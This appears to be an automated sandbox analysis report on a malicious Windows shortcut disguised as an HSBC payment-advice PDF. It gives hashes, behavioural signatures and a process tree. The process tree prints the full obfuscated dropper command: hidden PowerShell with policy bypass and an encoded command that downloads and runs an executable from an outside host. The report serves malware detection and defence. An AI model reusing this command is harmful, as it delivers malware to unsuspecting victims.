Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
26-07-2024 11:02
Static task
static1
Behavioral task
behavioral1
Sample
Payment Advice__HSBC Banking.pdf.lnk
Resource
win7-20240705-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
Payment Advice__HSBC Banking.pdf.lnk
Resource
win10v2004-20240709-en
13 signatures
150 seconds
General
-
Target
Payment Advice__HSBC Banking.pdf.lnk
-
Size
2KB
-
MD5
a38b0a4d0768ba8ce7c73904b55ee9ff
-
SHA1
a1a13ef45fcf88eaff3dcffba1fb2608aa07e3c8
-
SHA256
3f2491926888db2c9d6c7b1a426ff41e1cd4a13bc922156a814b9fe3032ff809
-
SHA512
4159cd37110d910624b8bb5c837e70668b3e6d795e1ab276ea32f5ab315509dedf11bd865d4c1be41f9cec698235453996939a0ac8a45f36a28a45bdf28b7cf8
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2860 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2860 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 2136 wrote to memory of 2536 2136 cmd.exe cmd.exe PID 2136 wrote to memory of 2536 2136 cmd.exe cmd.exe PID 2136 wrote to memory of 2536 2136 cmd.exe cmd.exe PID 2536 wrote to memory of 2860 2536 cmd.exe powershell.exe PID 2536 wrote to memory of 2860 2536 cmd.exe powershell.exe PID 2536 wrote to memory of 2860 2536 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Payment Advice__HSBC Banking.pdf.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cMD /c PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g2⤵
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2860